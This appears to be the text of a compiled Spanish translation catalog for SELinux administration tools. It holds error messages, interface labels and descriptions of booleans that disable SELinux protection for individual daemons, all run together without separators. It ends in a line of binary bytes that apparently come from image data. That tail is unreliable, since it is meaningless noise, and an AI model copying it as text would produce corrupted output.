No se puede confirmar la transacción·semanageNo se pudo crear el usuario SELinux para %sNo se pudo crear una clave para %sNo se pudo crear una clave para %s/%sNo se pudo crear la dirección para %sNo se pudo crear el contexto para %sNo se pudo crear el contexto para %s/%sNo se pudo crear el contexto de archivo para %sNo se pudo crear la interfaz para %sNo se pudo crear clave para %sNo se pudo crear asignación de ingreso para %sNo se pudo crear el puerto para %s/%sNo se puede crear manejador semanageNo se pudo borrar el usuario SELinux %sNo se pudo borrar la dirección %sNo se puede borrar el booleano %sNo se pudo borrar el contexto de archivo para %sNo se pudo borrar la interfaz %sNo se pudo eliminar la asignación de ingreso para %sNo se puede borrar el puerto %s/%sNo se pudo borrar el contexto de archivo %sNo se puede borrar el puerto %sNo se pudo determinar el modo de obediencia.
No se pudo establecer una conexión semanageNo se pudo extraer la clave para %sNo se pudieron listar los módulos SELinuxNo se pudieron listar los usuarios SELinuxNo se pudieron listar las direccionesNo se pueden listar los booleanosNo se pudieron listar los contextos de archivoNo se pudieron listar las interfacesNo se pudieron listar los contextos de archivoNo se pudieron listar las asignaciones de ingresoNo se pueden listar los puertosNo se pudieron listar los roles para el usuario %sNo se pudieron listar los contextos de archivoNo se pueden listar los puertosNo se pudo modificar el usuario SELinux %sNo se pudo modificar la dirección %sNo se pudo modificar el booleano %sNo se pudo modificar el contexto de archivo para %sNo se pudo modificar la interfaz %sNo se pudo modificar la asignación de ingreso para %sNo se pudo modificar el puerto %s/%sNo se pudo abrir el archivo %s
No se pudo consultar la dirección %sNo se pudo consultar el contexto de archivo %sNo se pudo consultar el contexto de archivo para %sNo se pudo consultar la interfaz %sNo se pudo consultar el puerto %s/%sNo se pudo consultar seuser para %sNo se pudo consultar usuario para %sNo se pudo eliminar el dominio permisivo %s (falló el borrado)No se pudo fijar el nivel MLS para %sNo se pudo fijar el rango MLS para %sNo se pudo fijar el usuario SELinux para %sNo se pudo poner el valor actual del booleano %sNo se pudo poner el contexto de dirección para %sNo se pudo fijar el contexto de ejecución a %s.
No se pudo poner el contexto de archivo para %sNo se pudo poner el contexto de interfaz para %sNo se pudo poner la máscara para %sNo se pudo poner el contexto de mensaje para %sNo se pudieron poner los campos mls en el contexto de dirección para %sNo se pudieron poner los campos mls en el contexto de archivo para %sNo se pudieron poner los campos mls en el contexto de interfaz para %sNo se pudo fijar los campos mls en el contexto de puerto para %s/%sNo se pudo fijar el nombre para %sNo se pudo poner el dominio %s permisivo (falló la instalación del módulo)No se pudo poner el contexto de puerto para %s/%sNo se pudo poner el rol en el contexto de dirección para %sNo se pudo poner el rol en el contexto de archivo para %sNo se pudo fijar el rol en el contexto de interfaz para %sNo se pudo poner el rol en el contexto de puerto para %s/%sNo se pudo poner el tipo en el contexto de dirección para %sNo se pudo poner el tipo en el contexto de archivo para %sNo se pudo poner el tipo en el contexto de interfaz para %sNo se pudo poner el tipo en el contexto de puerto para %s/%sNo se pudo poner al usuario en el contexto de dirección para %sNo se pudo poner al usuario en el contexto de archivo para %sNo se pudo poner el usuario en el contexto de interfaz para %sNo se pudo poner al usuario en el contexto de puerto para %s/%sNo se puede iniciar transacción semanageNo se pudo probar si el estado de MLS es activadoNo se pudo obtener el tipo por defecto.
Crear/Manipular archivos temporales en /tmpCronModo de Obediencia ActualPersonalizadoDemonio del Sistema DBUSBases de DatosBorrar %sBorrar Contexto de ArchivoBorrar Puerto de RedBorrar asignación de Usuario SELinuxBorrar UsuarioDescripciónInhabilitar la AuditoríaInhabilitar la protección SELinux para el Servidor de ClusterInhabilitar la protección de SELinux para EvolutionInhabilitar la protección de SELinux para el demonio HalInhabilitar la protección de SELinux para el demonio NIS PasswordInhabilitar la protección de SELinux para el demonio NIS TransferInhabilitar la protección de SELinux para NetworkManagerInhabilitar la protección de SELinux para ThunderbirdInhabilitar la protección SELinux para del demonio acctInhabilitar la protección SELinux para amandaInhabilitar la protección SELinux para amavisInhabilitar la protección SELinux para el demonio apmdInhabilitar la protección SELinux para el demonio arpwatchInhabilitar la protección SELinux para el demonio auditdInhabilitar la protección SELinux para el demonio automountInhabilitar la protección SELinux para avahiInhabilitar la protección SELinux para el demonio bluetoothInhabilitar la protección SELinux para el demonio cannaInhabilitar la protección SELinux para el demonio cardmgrInhabilitar la protección SELinux para el demonio cipedInhabilitar la protección SELinux para el demonio clamdInhabilitar la protección SELinux para clamscanInhabilitar la protección SELinux para clvmdInhabilitar la protección SELinux para el demonio comsatInhabilitar la protección SELinux para el demonio courierInhabilitar la protección SELinux para el demonio cpucontrolInhabilitar la protección SELinux para el demonio cpuspeedInhabilitar la protección de SELinux para el demonio crondInhabilitar la protección de SELinux para el demonio cups hplipInhabilitar la protección de SELinux para el servidor de bajo nivel de cupsdInhabilitar la protección de SELinux para el demonio cupsdInhabilitar la protección de SELinux para cupsd_lpdInhabilitar la protección de SELinux para el demonio cvsInhabilitar la protección de SELinux para el demonio cyrusInhabilitar la protección de SELinux para el demonio dbskkdInhabilitar la protección de SELinux para el demonio dbusdInhabilitar la protección de SELinux para dccdInhabilitar la protección de SELinux para dccifdInhabilitar la protección de SELinux para dccmInhabilitar la protección de SELinux para el demonio ddtInhabilitar la protección de SELinux para el demonio devfsdInhabilitar la protección de SELinux para el demonio dhcpcInhabilitar la protección de SELinux para el demonio dhcpdInhabilitar la protección de SELinux para el demonio dictdInhabilitar la protección de SELinux para el demonio distccdInhabilitar la protección de SELinux para el demonio dmesgInhabilitar la protección de SELinux para el demonio dnsmasqInhabilitar la protección de SELinux para el demonio dovecotInhabilitar la protección de SELinux para el demonio entropydInhabilitar la protección de SELinux para fetchmailInhabilitar la protección de SELinux para el demonio fingerdInhabilitar la protección de SELinux para el demonio freshclamInhabilitar la protección de SELinux para el demonio fsdaemonInhabilitar la protección de SELinux para los juegosInhabilitar la protección de SELinux para el demonio gpmInhabilitar la protección de SELinux para el demonio gssInhabilitar la protección de SELinux para el demonio hostnameInhabilitar la protección de SELinux para el demonio hotplugInhabilitar la protección de SELinux para el demonio howlInhabilitar la protección de SELinux para suexec de httpInhabilitar la protección de SELinux para la rotación de logs de httpdInhabilitar la protección de SELinux para el demonio hwclockInhabilitar la protección de SELinux para el demonio i18nInhabilitar la protección de SELinux para el demonio imazesrvInhabilitar la protección de SELinux para los demonios hijos de inetdInhabilitar la protección de SELinux para el demonio inetdInhabilitar la protección de SELinux para el demonio inndInhabilitar la protección de SELinux para el demonio iptablesInhabilitar la protección de SELinux para el demonio ircdInhabilitar la protección de SELinux para el demonio irqbalanceInhabilitar la protección de SELinux para el demonio iscsiInhabilitar la protección de SELinux para el demonio jabberdInhabilitar la protección de SELinux para el demonio kadmindInhabilitar la protección de SELinux para el demonio klogdInhabilitar la protección de SELinux para el demonio krb5kdcInhabilitar la protección de SELinux para los demonios ktalkInhabilitar la protección de SELinux para el demonio kudzuInhabilitar la protección de SELinux para el demonio locateInhabilitar la protección de SELinux para el demonio lpdInhabilitar la protección de SELinux para el demonio lrrdInhabilitar la protección de SELinux para el demonio lvmInhabilitar la protección de SELinux para mailmanInhabilitar la protección de SELinux para el demonio mdadmInhabilitar la protección de SELinux para el demonio monopdInhabilitar la protección de SELinux para el demonio mrtgInhabilitar la protección de SELinux para el demonio mysqldInhabilitar la protección de SELinux para el demonio nagiosInhabilitar la protección de SELinux para el demonio namedInhabilitar la protección de SELinux para el demonio nessusdInhabilitar la protección de SELinux para el demonio nfsdInhabilitar la protección de SELinux para el demonio nmbdInhabilitar la protección de SELinux para el demonio nrpeInhabilitar la protección de SELinux para el demonio nscdInhabilitar la protección de SELinux para el demonio nsdInhabilitar la protección de SELinux para el demonio ntpdInhabilitar la protección de SELinux para oddjobInhabilitar la protección de SELinux para oddjob_mkhomedirInhabilitar la protección de SELinux para el demonio openvpnInhabilitar la protección de SELinux para el demonio pamInhabilitar la protección de SELinux para pegasusInhabilitar la protección de SELinux para el demonio perditionInhabilitar la protección de SELinux para el demonio portmapInhabilitar la protección de SELinux para el demonio portslaveInhabilitar la protección de SELinux para postfixInhabilitar la protección de SELinux para el demonio postgresqlInhabilitar la protección de SELinux para pptpInhabilitar la protección de SELinux para el demonio prelinkInhabilitar la protección de SELinux para el demonio privoxyInhabilitar la protección de SELinux para el demonio ptalInhabilitar la protección de SELinux para el demonio pxeInhabilitar la protección de SELinux para pyzordInhabilitar la protección de SELinux para el demonio quotaInhabilitar la protección de SELinux para el demonio radiusdInhabilitar la protección de SELinux para el demonio radvdInhabilitar la protección de SELinux para rdiskInhabilitar la protección de SELinux para readaheadInhabilitar la protección de SELinux para restorecondInhabilitar la protección de SELinux para el demonio rhgbInhabilitar la protección de SELinux para ricciInhabilitar la protección de SELinux para ricci_modclusterdInhabilitar la protección de SELinux para el demonio rlogindInhabilitar la protección de SELinux para el demonio rpcdInhabilitar la protección de SELinux para el demonio rshdInhabilitar la protección de SELinux para el demonio rsyncInhabilitar la protección de SELinux para el demonio saslauthdInhabilitar la protección de SELinux para el demonio scannerdaemonInhabilitar la protección de SELinux para el demonio sendmailInhabilitar la protección de SELinux para setransInhabilitar la protección de SELinux para el demonio setroubleshootInhabilitar la protección de SELinux para el demonio slapdInhabilitar la protección de SELinux para el demonio slrnpullInhabilitar la protección de SELinux para el demonio smbdInhabilitar la protección de SELinux para el demonio snmpdInhabilitar la protección de SELinux para el demonio snortInhabilitar la protección de SELinux para el demonio soundInhabilitar la protección de SELinux para el demonio sounddInhabilitar la protección de SELinux para el demonio spamdInhabilitar la protección de SELinux para el demonio speedmgmtInhabilitar la protección de SELinux para el demonio squidInhabilitar la protección de SELinux para el demonio sshInhabilitar la protección de SELinux para el demonio stunnelInhabilitar la protección de SELinux para el demonio swatInhabilitar la protección de SELinux para el demonio sxidInhabilitar la protección de SELinux para el demonio syslogdInhabilitar la protección de SELinux para los trabajos cron de sistemaInhabilitar la protección de SELinux para el demonio tcpInhabilitar la protección de SELinux para el demonio telnetInhabilitar la protección de SELinux para el demonio tftpdInhabilitar la protección de SELinux para los navegadores webInhabilitar la protección de SELinux para el demonio transproxyInhabilitar la protección de SELinux para el demonio udevInhabilitar la protección de SELinux para el demonio umlInhabilitar la protección de SELinux para el demonio updfstabInhabilitar la protección de SELinux para el demonio uptimedInhabilitar la protección de SELinux para el demonio uucpdInhabilitar la protección de SELinux para el demonio vmwareInhabilitar la protección de SELinux para el demonio watchdogInhabilitar la protección de SELinux para el demonio winbindInhabilitar la protección de SELinux para el demonio xdmInhabilitar la protección de SELinux para xen controlInhabilitar la protección de SELinux para el demonio xenInhabilitar la protección de SELinux para el demonio xfsInhabilitar la protección de SELinux para el demonio ypbindInhabilitar la protección de SELinux para el demonio ypservInhabilitadoInhabilitado
Permisivo
Obediente
No permitir a ningún proceso cargar módulos del kernelNo permitir a ningún proceso modificar la política de SELinux del kernelNo permitir la transición a sysadm_t, sudo y suNo auditar cosas que ya se saben que no andan bien y que no representan riesgos de seguridadEditar Puerto de RedPermitir AuditarInhabilitar reglas de auditoría adicional, que no son normalmente informadas en los archivos log.ObedienteIngrese la dirección completa del ejecutable a confinar.Ingrese la dirección completa al script de inicio usado para iniciar la aplicación confinada.Ingrese un nombre único para la aplicación o rol de usuario confinado.Error al asignar memoria.
Error al asignar argv0 del shell.
Error al cambiar uid, abortando.
Error al conectar al sistema de auditoría.
Error al desechar la capacidad SETUID, abortando
Error al desechar las capacidades, abortando
Error al liberar caps
Error iniciando las capacidades, abortando.
Error al resetear KEEPCAPS, abortando
Error al enviar un mensaje de auditoría.
Error al configurar KEEPCAPS, abortando
Error al configurar las capacidades, abortando.
¡Error! No se pudo abrir %s.
¡Error! El shell no es válido.
Error: se especificaron múltiples niveles
Error: se especificaron roles múltiples
Error: se especificaron tipos múltiples
Error: Ud. no tiene permiso para cambiar los niveles en una terminal no segura
EjecutableRoles de Usuario Existentes_Usuario ExistenteFallo al cerrar tty adecuadamente
Especificación
de ArchivoTipo de
ArchivoArchivo de Contextos de ArchivoEtiquetado de ArchivoEspecificación de ArchivoTipo de ArchivoEl contexto de archivo para %s está definido en la política, no se puede borrarEl contexto de archivo para %s no está definidoFiltroGPLJuegosGenerar nuevo módulo de políticaVer GrupoServicio HTTPDScript de inicioInteractúa con la terminalLa interfase %s está definida en la política, no se puede borrarLa interfaz %s no está definidaArchivo de InterfaseDemonios de Servicios de Internet (inetd)Los Demonios de Servicios de Internet son los demonios iniciados por xinetdEspecificación de archivo inválidaKerberosEtiquetadoEl Grupo Linux %s no existeEl Usuario de Linux %s no existeVer como ListaCargar Módulo de PolíticaCargar módulo de políticasBloquear...Nombre de
IngresoSe requiere el ingreso con '%s'Nombre de IngresoLa asignación de ingreso para %s se definió en la política, no se puede eliminarLa asignación de ingreso para %s no está definidaNivel MCSRango MCSMLSMLS/Rango
MLS/MCSMLS/MCS
NivelRango MLS/MCSProtección de MemoriaRol de Usuario de la Terminal MínimaRol de Usuario de Ventanas X Mínimo.Modificar %sModificar Contexto de ArchivoModificar asignación de Usuario SELinuxModificar UsuarioModificar el registro de nombre de ingreso de usuario existente.El módulo %s.pp ya está cargado en la política actual.
¿Desea continuar?Nombre de MóduloMontarNFSNISNombreServicio de NombreConfiguración de RedPuerto de RedNo hay contexto en el archivo %s
Se requiere una Dirección de NodoSe requiere una Máscara de red del NodoTodavía no implementadoError en Opciones %s¡Falta memoria!
Contraseña:PermisivoPolgenDirectorio de PolíticaMódulo de PolíticaPuertoEl puerto %s/%s ya está definidoEl puerto %s/%s está definido en la política, no se puede borrarEl puerto %s/%s no está definidoNúmero de PuertoSe requiere un puertoEl número de puerto "%s" no es válido.  0 < NUMERO_DE_PUERTO < 65536Los puertos deben ser números o rangos entre 1 y %dPrefijoImpresiónDominio del ProcesoProtoProtocoloSe requiere protocolo udp o tcpRed Hat 2007Reetiquetar en la próxima reiniciada.Eliminar módulo de política cargableSe requiere al menos una categoríaSe requiere prefijo o rolesSe requiere prefijo, roles, nivel o rangoSe requiere setypeSe requiere setype o serangeSe requiere setype, serange o seuserSe requiere seuser o serangeRevertir los valores booleanos a los predeterminados del sistemaRolRol de Usuario Root AdministrativoEjecutar el asistente de bloqueo de booleanosServidor de autenticación SASLUsuario
SELinuxAdministración de SELinuxInterfaz SELinuxGenerador de Políticas de SELinuxPuerto SELinux
TipoTipo de Puerto SELinuxRoles SELinuxProtección de Servicios de SELinuxTipo SELinuxSe requiere el tipo SELinux Usuario SELinux booleano SELinuxfcontext SELinuxLa política SELinux es no manejada o no se puede acceder al almacenamiento.El usuario SELinux %s está definido en política, no puede ser borradoEl usuario SELinux %s no está definidoSe requiere el usuario SELinux '%s'SSHSambaSeleccionar Objeto de AdministraciónSeleccionar PuertosSeleccione el Rol de Usuario Root Administrativo, si este usuario será el usado para administrar la máquina mientras corra como root. Este usuario no podrá ingresar al sistema directamente.Seleccione el directorio donde generar los archivos de políticaSeleccione el/los directorio(s) que pertenecen a la aplicación confinada y a los que escribeSeleccione el archivo ejecutable a confinar.Seleccione los archivos a los que la aplicación escribe o generaSeleccione si desea reetiquetar todo el sistema de archivo en la siguiente reiniciada. El reetiquetado toma mucho tiempo, dependiendo del tamaño del sistema. Si cambia los tipos de políticas o va de desactivado a obediente, se requiere un reetiquetado.Seleccione el script de inicio a confinar.Seleccione los dominios que desearía que administre este usuario.Seleccione los roles de usuario que transicionarán a este dominio de aplicacionesSelinux
Tipo de ArchivoTransacción semanage actualmente en progresoTransacción semanage no ejecutándoseEnviar mensajes de auditoríaEnviar correoScript de ConfiguraciónLo siento, -l se puede usar cuando hay soporte para SELinux MLS.
Lo siento, newrole sólo se puede usar en un kernel SELinux.
Lo siento, run_init sólo se puede usar en un kernel SELinux.
Protección contra spamSquidDemonio de Inicio EstándarLos Demonios de Inicio Standard son los demonios que se inician al arrancar a través de los scripts de inicio. Normalmente requieren un script en /etc/rc.d/init.dEstadoModo de Obediencia por Defecto del SistemaTipo de Política por Defecto del Sistema:Este usuario puede ingresar a una máquina vía X o una terminal. Por def scto este usuario no tendrá setuid, ni red, ni su,Este usuario ingresará a una máquina sólo a través de una terminal o login remoto. Por defecto, este usuario no tendrá setuid, ni red, ni su, ni sudo.Para hacer este paquete de políticas activo, ejecute:Cambiar entre los Personalizados y Todos los BooleanosCambiar entre los Personalizados y Todos los PuertosCambiar entre todos los contextos de archivo y los personalizadosTransicionar los usuarios SELinux del staff al Dominio del Navegador WebTransicionar el usuario SELinux sysadm al Dominio del Navegador WebTransicionar el usuario SELinux user al Dominio del Navegador WebTransicionar el usuario SELinux xguest al Dominio del Navegador WebEl tipo  %s_t ya está definido en la política actual.
¿Desea continuar?Archivo de Tipo de ObedienciaSe requiere tipoUSO: run_init <script> <args ...>
  donde: <script> es el nombre del script de inicio a ejecutar,
         <args ...> son los argumentos al script.Los Tipos de USUARIO obtienen un tipo tmp automáticamenteNo se pudo asignar memoria para el new_contextNo se pudo limpiar el entorno
Imposible obtener señal de vacío
Imposible restaurar el entorno, abortando
Imposible restaurar la etiqueta tty...
Imposible poner el manejador SIGHUP
Tunel SSL UniversalFalta el protocolo o es desconocidoPuertos No Reservados (>1024)Use %s -LUse %s -L -l usuarioUse %s -d Archivo ...Use %s -l -d usuario ...Use %s -l CATEGORY usuario ...Use %s -l [[+|-]CATEGORY],...]q usuario ...Use %s CATEGORY Archivo ...Use %s [[+|-]CATEGORY],...]q Archivo ...Use -- to finalizar la lista de ociones. Por ejemploAplicación del UsuarioLa Aplicación del Usuario es cualquier aplicación que desee confinar y que es iniciada por un usuarioMapeado de UsuarioPrivados del UsuarioRol de UsuarioEl Usuario con red completo, no hay setuid de aplicaciones sin transición, sin su, y puede hacer sudo a Roles de Administración RootUsuario con red completa, sin setuid para aplicaciones sin transición, sin sudo ni su.Usa Pam para la autenticaciónUsa dbusUsa nsswitch o llamadas getpw*Verificar NombreVersión¡Advertencia! No se pudo obtener la información de tty.
¡Precaución!  No se pudo restablecer el contexto para %s
Aplicaciones Web/Scripts (CGI)Aplicaciones WebScripts (CGI)/Aplicaciones Web son los scripts CGI iniciados por el servidor web (apache)Escribe mensajes syslog	XENServidorXDebe agregar al menos un rol para %sDebe ingresar un ejecutableDebe ingresar un nombre para su proceso/usuario confinadoDebe ingresar la dirección del ejecutable para su proceso confinadoDebe seleccionar un usuarioDebe especificar uno de los siguientes valores: %s_Eliminar_Propiedadestodostodos los archivos
archivo regular
directorio
dispositivo de caracter
dispositivo de bloque
socket
enlace simbólico
tubería con nombre
falló la autenticación.
no se puede encontrar un registro válido en el archivo passwd.
chcat -- -ConfidencialEmpresa /docs/plandenegocios.odtchcat -l +ConfidencialEmpresa jusererror al leer la configuración del servicio PAM.
fallo al construir el rango nuevo con el nivel %s
fallo al convertir el contexto nuevo a cadena
fallo al ejecutar shell
fallo al obtener la información de la cuenta.
fallo al obtener el contexto nuevo.
fallo al obtener old_context.
fallo al inicializar PAM
fallo al fijar PAM_TTY
fallo al fijar el rango n uevo %s
fallo al fijar nuevo rol %s
fallo al fijar el tipo nuevo %s
getpass no puede abrir /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error en línea %lu.
newrole: error al crear proceso: %snewrole: contraseña incorrecta para %s
newrole: sobreflujo en tabla hash de configuración de nombres de servicio
apagadoencendidopppdrsyncrun_init: contraseña incorrecta para %s
system-config-selinuxDomingo Becker, domingobecker@gmail.com, 2007, 2008, 2009tipodesconocidouso:  %s [-qi]
use_syslog debe ser un valor booleano 
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`